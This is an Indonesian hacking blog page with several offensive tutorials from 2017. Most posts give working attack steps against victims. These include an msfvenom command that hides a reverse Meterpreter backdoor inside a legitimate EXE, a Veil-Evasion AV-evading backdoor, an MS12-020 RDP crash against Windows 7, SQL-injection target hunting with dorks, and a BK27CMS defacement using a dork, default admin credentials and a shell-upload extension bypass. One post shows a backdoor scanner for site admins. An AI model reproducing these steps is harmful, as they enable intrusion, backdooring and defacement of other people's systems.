News Ticker

Latest Posts

Cara Menemukan File Backdoor Di Suatu WEB

- Friday, September 22, 2017 3 Comments
lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di SINI Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Mencari Halaman Login Admin

- Thursday, September 21, 2017 No Comments
Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

- Sunday, August 20, 2017 3 Comments

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Menyisipkan Backdoor ke File EXE

- Thursday, August 17, 2017 1 Comment
Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
  4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  5. atau command di bawah ini (untuk 64 bit atau x64)
  6. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  7. Isi LHOST dengan IP agan masing"
  8. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  9. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  10. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  11. Ingat LHOST dan LPORT isi punya agan sendiri :D
  12. Nah lalu pindah tuh ke PC korban :D
  13. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  14. Selamat Mengeksploitasi PC korban :v

BSOD Attack Pada Windows Dengan Metasploit

- Wednesday, August 2, 2017 3 Comments

BSOD Attack Pada Windows Dengan Metasploit


BSOD Attack

BSOD (Bluescreen of death), kalian pasti pada tahu apa itu bluescreen, bluescreen biasanya terjadi karna adanya gangguan pada sistem operasi atau harddisk yg kita pakai, namun Bluescreen yg akan kita bahas ini terjadi karena serangan DOS menggunakan tool METASPLOIT, berikut tutorialnya :

Syarat :
- korban menggunakan windows 7
- satu jaringan
- korban sudah mengaktifkan "allow remote desktop".

BACA JUGA :


1. Buka metasploit console anda
2. lalu ketikkan :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Target saya memiliki ip 192.168.43.93 , silahkan sobat sesuaikan dengan ip target sobat, lalu ketik seperti berikut :
set RHOST 192.168.43.93

4. Nah setelah memasukan IP target, tinggal kita exploit, dengan mengetikkan perintah :
exploit

5. Jika berhasil, akan ditunjukkan dengan peringatan :
[+] 192.168.43.93:3389 - 192.168.43.93:3389 seems down
6. Windows pun akan bluescreen, ada juga yg langsung mati lalu melakukan restart secara paksa.

Bila kurang jelas, berikut ada videonya :


Cara Menemukan Cela Website Dengan SQL Poizon

- Saturday, July 22, 2017 12 Comments

        Hello Beb , Kuy ,Gan ,Om  , Tante Sekalian Udh Lama Gk Posting Di Karnakan Sibuk Di Dunyat (Dunia Nyata). Ini Artikel Saya Yg Kedua,, Jarang Post Yahh :'v Ya Iyalah Ente kira gampang buat nyari bahan buat di post,di tambah lagi urusan tentang ceuek , Hey Kamu Apa Kabar #Nf wkwkwk Jadi Curhat :v Halah Gk Ush Ngebacot Lagi Langsung Aja Masuk Ke Tutorial Kali Ini Cara Menemukan Celah Website Dg SQL Poizon.
              Setelah kita mengetahui cara melakukan sqlinjection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakansql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini 

Step 1: Download SQL Poizon Software
Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.


Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”





Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.



Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln 




Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan toolhavij untuk SQLi

Oke deh sekian dulu tutorial
kalau masih ada yg kurang jelas atau mau belajar seputar hacking  PM saja fb saya 
Di Sini

btw makasih buat Habil Zeus Udh Ngizinin Post Postingan yg sama hehehe.


Tutorial Deface bk27cms bypass administrator

- Wednesday, June 28, 2017 No Comments

Tutorial Deface bk27cms bypass administrator


Hell come back to maxteroit boy, sorry baru update lagi, dan kali ini saya akan membahas tentang Tutorial Deface bk27cms bypass administrator, dan tutorial ini saya dapatkan dari teman se-team saya yg bernickname k4luga, alias mas adhi :* , oke langsung saja kita bahas tutorialnya.

Dork sementara :
intext:Powered by BK27CMS

selebihnya kembangin sendiri yha :)

Pertama, kita dorking dulu menggunakan dork diatas :


setelah itu, kita pilih salah satu calon korbannya, jika sudah memilih, tambahkan /bk27panel setelah domain utama, misal >>> target.com/bk27panel

Kedua, Setelah masuk ke web loginnya, masukkan :
username : webmaster

dan password : 303305


Ketiga, setelah berhasil login, masuk ke tab Komponen


Keempat, tugas kita disini yaitu uploading shell, untuk itu, pilihlah menu Files Upload seperti gambar berikut


Kelima, nanti disana tersedia uploader files, nah disini sebaiknya kita bypass ekstensi shellnya dengan ekstensi .php.pjpeg >>> shell.php.pjpeg, lalu klik browse, trus carilah shell kalian untuk diupload.


Keenam, jika sudah terupload, akan tercantum nama file yg sudah kita upload tadi, lalu klik kanan lah mouse kalian lalu copy link location shell kalian, seperti berikut



Jika shell sudah terakses, terserah kalian mau kalian apaain :v , kami tidak bertanggung jawab :v,
sekianlah tutorial sederhana dari maxteroit, jika ada yg tidak jelas, silahkan tanyakan di komentar,
terima kasih

thx to :
k4luga a.k.a mas adhi (Owl Squad)